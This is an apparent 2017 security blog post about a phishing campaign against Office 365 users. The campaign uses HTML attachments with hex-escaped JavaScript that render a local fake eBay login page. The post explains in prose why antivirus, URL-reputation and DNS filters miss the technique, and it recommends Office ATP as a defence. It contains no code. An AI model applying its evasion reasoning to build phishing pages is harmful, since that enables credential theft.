Hex Escape Characters Phishing Attack on Office 365

By | September 4, 2017

In the last days many customer complaining about new phishing attack against Office 365 users that called “Hexadecimal Escape Characters”. The attack has an HTML attachment with a javascript snippet, and the content is encoded through hexadecimal escape characters, therefore no links are visible, but when opened, it presents a locally-generated phishing page with login instructions.

Here’s one example that we’ve seen in several instances: a fake ebay .com email that, when rendered, displays a forged Ebay login.

How it works

Once you get a message, let’s say from Ebay, and you click on what looks like a link, but is actually a local file. The ‘link’ (attachment) then opens the Ebay login page that you would have expected. Sophisticated users would see the top bar starting with ‘file’ and not ‘https’ but many won’t notice. Once you put in your credentials, the submit button sends the information to the hackers. The page and its form is rendered locally so that nothing is sent or received until you click ‘submit’.

How the attack passing your security

There are several factors in this attack that make it unique, allowing it to bypass most security tools– including Exchange Online default security.

– Scanning this file with most antiviruses and emulating the file in a number of failed to find it as malicious. This is because it has no known signature, and no active content (macro etc). It also has no apparent links – those are obscured and not easy to extract.

– They don’t consider an HTML file with a form and a submit button as malicious. It is not considered ‘active’ code. As a result, the attachment is not found to be malicious when scanned.

– The fake “login” screen is local. Firewalls or browser plugins that use URL reputation for IPs and domains are completely blind to this because it isn’t going to the internet to fetch the page, it is local. Same applies to any DNS based security, like OpenDNS from Cisco and similar tools.

What can you do?
For now the best way is to use the Office ATP (Advanced Threat Protection).
The Office ATP can scan, recognize the malicious url and prevent users from browsing to those url.

(Visited 71 times, 1 visits today)